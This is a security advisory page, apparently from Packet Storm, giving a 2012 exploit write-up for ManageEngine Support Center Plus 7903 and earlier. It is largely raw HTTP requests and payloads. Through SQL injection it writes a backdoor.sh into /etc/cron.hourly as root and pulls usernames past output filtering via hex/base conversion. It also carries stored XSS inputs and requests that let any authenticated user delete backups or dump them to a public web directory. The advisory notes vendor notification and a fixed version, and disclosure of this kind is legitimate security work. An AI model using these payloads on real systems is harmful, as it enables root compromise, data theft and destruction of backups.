exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ManageEngine Support Center Plus 7903 XSS / SQL Injection

ManageEngine Support Center Plus 7903 XSS / SQL Injection
Posted Apr 15, 2012
Authored by xistence

ManageEngine Support Center Plus versions 7903 and below suffer from backup related, unauthorized access, cross site scripting, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | 00f2539984dab23c36d58c4e258af76a9f0554b23a8e7f3047e20d3d1a2fd7a1

ManageEngine Support Center Plus 7903 XSS / SQL Injection

Change Mirror Download
  _______         _______  _______             __
| _ |.--.--.| _ || _ | .-----.| |
|. | ||_ _|| | ||. | | __ | || |
|. | ||__.__| \___ ||. | ||__||__|__||__|
|: 1 | |: 1 ||: 1 |
|::.. . | |::.. . ||::.. . |
`-------' `-------'`-------'

+--------------------------------------------------------------------------------------------------------------------------------+
| Exploit Title : ManageEngine Support Center Plus <=7903 Multiple Vulnerabilities
| Date : 15-04-2012
| Author : Robert 'xistence' van Hamburg (xistence<[AT]>0x90.nl
| Software link SP : http://www.manageengine.com/products/support-center/64045241/ManageEngine_SupportCenter_Plus_7_9_0_SP-0_3_0.ppm
| Vendor site : http://www.manageengine.com/products/support-center/
| Version : 7903 and lower
| Tested on : CentOS 5 Linux (Windows version also vulnerable, although untested)
|
| Vendor Notified : 24-08-2011
| Vendor Fixed : 05-01-2012
| Fixed version : 7905 - latest = 7908
+--------------------------------------------------------------------------------------------------------------------------------+


+--------------------------------------------------------------------------------------------------------------------------------+
| 0x01 - SQL Injection in Row Count
+--------------------------------------------------------------------------------------------------------------------------------+

Normally when you click on the row count the following POST request is executed:

POST /servlet/AJaxServlet?action=getWorkOrderCount HTTP/1.1
Host: supportcenter:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:6.0.2) Gecko/20100101 Firefox/6.0.2
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://supportcenter:8080/WOListView.do?viewName=All_Requester
Content-Length: 2062
Cookie: JSESSIONID=8C712F3C4F909CB5ABE4B2E9E688C55D; 2RequestsshowThreadedReq=showThreadedReqshow;
2RequestshideThreadedReq=hideThreadedReqhide; JSESSIONIDSSO=5E58C910F58B97EF3776124641E4C4CC; PREV_CONTEXT_PATH=/custom
Pragma: no-cache
Cache-Control: no-cache

countSql=select%20count(*)%20from%20workorder%20wo%20left%20join%20workorder_fields%20wof%20on%20wo.workorderid%3Dwof.workorderid%20left%20join%20workorder_product%20on%20wo.workorderid%3Dworkorder_product.workorderid%20left%20join%20componentdefinition%20on%20workorder_product.product_id%3Dcomponentdefinition.componentid%20inner%20join%20workorderstates%20wos%20on%20wo.workorderid%3Dwos.workorderid%20left%20join%20categorydefinition%20cd%20on%20wos.categoryid%3Dcd.categoryid%20left%20join%20subcategorydefinition%20scd%20on%20wos.subcategoryid%3Dscd.subcategoryid%20left%20join%20aaauser%20aau%20on%20wo.requesterid%3Daau.user_id%20left%20join%20aaauser%20ti%20on%20wos.ownerid%3Dti.user_id%20left%20join%20statusdefinition%20std%20on%20wos.statusid%3Dstd.statusid%20left%20join%20departmentdefinition%20dpt%20on%20wo.deptid%3Ddpt.deptid%20left%20join%20workorder_account%20woacc%20on%20wo.workorderid%3Dwoacc.workorderid%20left%20join%20aaausercontactinfo%20user_contact%20on%20aau.user_id%3Duser_contact.user_id%20left%20join%20aaacontactinfo%20rcontact%20on%20user_contact.contactinfo_id%3Drcontact.contactinfo_id%20left%20join%20leveldefinition%20lvd%20on%20wos.levelid%3Dlvd.levelid%20left%20join%20prioritydefinition%20pd%20on%20wos.priorityid%3Dpd.priorityid%20left%20join%20modedefinition%20mdd%20on%20wo.modeid%3Dmdd.modeid%20left%20join%20aaausercontactinfo%20auci1%20on%20aau.user_id%3Dauci1.user_id%20left%20join%20aaacontactinfo%20aci1%20on%20auci1.contactinfo_id%3Daci1.contactinfo_id%20left%20join%20workorder_queue%20wo_queue%20on%20wo.workorderid%3Dwo_queue.workorderid%20left%20join%20queuedefinition%20queue%20on%20wo_queue.queueid%3Dqueue.queueid%20left%20join%20sduser%20crd%20on%20wo.createdbyid%3Dcrd.userid%20left%20join%20aaauser%20cri%20on%20crd.userid%3Dcri.user_id%20left%20join%20aaaorganization%20org%20on%20woacc.accountid%3Dorg.org_id%20left%20join%20aaaorganization%20sorg%20on%20woacc.subaccountid%3Dsorg.org_id%20where%20%20((aau.user_id%20%3D%202)%20and%20((wo.isparent%20%3D%20'1')%20and%20(wo.departmentid%20%3D%201)))

File access as root:
As you see, you can put a normal MySQL query in the countSql parameter.
However, I found out there is some input and output validation in place. It's not possible to use a "CREATE", or "INSERT" query. SELECT however is possible.
This still makes it possible to use the following trick:

Add an attachment to a (new) ticket, like a "backdoor.sh" and press attach. BUT DO NOT PRESS "DONE"! Keep the window open. The file will be in a temporary directory now. (/ManageEngine/SupportCenter/bin/Attachments/Request/<YOURUSERID>/)

Now send a POST request with:

countSql=select load_file("../../bin/Attachments/Request/<YOURUSERID>/backdoor.sh") into dumpfile "/etc/cron.hourly/backdoor.sh";

Which creates the backdoor.sh file in /etc/cron.hourly.

Above is a blind SQL injection, as you won't see the results in your browser.
Extra note: "grant" is possible too, so you could add any user or change permissions.


IDS/Output validation bypass:

After some testing I found out it's only possible to get numeric responses back in the web browser. So you can't read usernames/md5 hashes directly from the database. However, it's still possible to bypass this "protection":

We can send a query that retrieves the username of user_id =2 from the aaauser table, convert it to hex (base 16) and then convert it to base 10:
countSql=select conv(hex(first_name),16,10) from aaauser where user_id = 2;

This will give the following result:

444351214452

Now in any local MySQL instance you can convert that back to hex (base 16) and unhex it:

mysql> select unhex(conv('444351214452', 10, 16));
+-------------------------------------+
| unhex(conv('444351214452', 10, 16)) |
+-------------------------------------+
| guest |
+-------------------------------------+


+--------------------------------------------------------------------------------------------------------------------------------+
| 0x02 - Stored XSS vulnerability as anonymous user
+--------------------------------------------------------------------------------------------------------------------------------+

XSS/Cross Site Scripting vulnerability as anonymous user:
http://support:8080/sd/Request.sd
Vulnerable input fields are: Name, Message
Input: <script>alert('Hello World')</script>

E-mail: my-email@test'<script>alert('Hello World')</script>


+--------------------------------------------------------------------------------------------------------------------------------+
| 0x03 - Stored XSS vulnerabilities as ANY authenticated user - user details
+--------------------------------------------------------------------------------------------------------------------------------+

Possible by browsing to this url and fill in the form fields
http://support:8080/RequesterDef.do?mode=edit&id=2 (id of the current user)
Vulnerable input fields are: Name, Twitter Screen Name, Job Title

Input: <script>alert('Hello World')</script>

+--------------------------------------------------------------------------------------------------------------------------------+
| 0x04 - Stored XSS vulnerabilities as ANY authenticated user - ticket
+--------------------------------------------------------------------------------------------------------------------------------+

Create a new request through the website with the http://<SUPPORTCENTER>:8080/WorkOrder.do url as any user. Enter any subject and select Plain Text on the description. Enter <script>alert("Hello World")</script> in the description field. Press "Add Request".

Now when you browse to the http://<SUPPORTCENTER>:8080/WOListView.do and click on the ticket you just created you'll receive a popup which says "Hello World", which makes it possible to put stored javascript/html code inside the description.

POST a new request (below are the headers to exploit this)
POST /WorkOrder.do HTTP/1.1
Host: support:8080
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://support:8080/WorkOrder.do
Cookie: JSESSIONID=75291FED727C1BCA5CD2F5A46AA97071; PREV_CONTEXT_PATH=; JSESSIONIDSSO=BA4D299A5FCBAB586F462AED5A730D67
Content-Type: application/x-www-form-urlencoded
Content-Length: 322

PARAMETERS: reqTemplate=&prodId=0&priority=2&reqID=2&usertypename=Requester&reqName=guest&category=1&item=0&subCategory=0&title=Test&description=%3Cbr+%2F%3E%3Cscript%3Ealert%28%27Hello+World%27%29%3C%2Fscript%3E&MOD_IND=WorkOrder&FORMNAME=WorkOrderForm&attach=&attPath=&component=Request&attSize=&attachments=&autoCCList=&addWO=addWO


+--------------------------------------------------------------------------------------------------------------------------------+
| 0x05 - Delete Support Center Plus Backups as ANY authenticated user
+--------------------------------------------------------------------------------------------------------------------------------+

Delete Support Center Plus Backups as ANY authenticated user
Change the ids= to delete other backups
http://support:8080/BackupSchedule.do?module=delete_backup&backup_ids=<ID>


+--------------------------------------------------------------------------------------------------------------------------------+
| 0x06 - Create a Backup schedule as ANY authenticated user and write the backup file to a public accessible directory
+--------------------------------------------------------------------------------------------------------------------------------+

Create a Backup schedule as ANY authenticated user and write backup file to a public access directory
Below are the headers to create a backup schedule on 2011-08-24 13:10. After this has been done, it's possible to download
the Support Center Plus backup file at http://support:8080/inlineimages/backup_supportcenter_7901_fullbackup_08_24_2011_13_10.data
For this you only need to know the version of the support center and the date/time (which we set our selfs in the POST)

POST /BackupSchedule.do HTTP/1.1
Host: support:8080
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://support:8080/AdminHome.do
Cookie: JSESSIONID=001CFC62780059CC1FC04ADA6CF7347D; PREV_CONTEXT_PATH=; fromPortal=customerportal; JSESSIONIDSSO=57D961350A26A1D9D8C70AFA6E10760E
DNT: 1
Pragma: no-cache
Cache-Control: no-cache

PARAMETERS module=save_schedule&days=1&backupStartDate=2011-08-24&hours=13&minutes=10&backupType=fullbackup&backupstatus=enabled&backupLocation=..%2Finlineimages%2F


Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    5 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close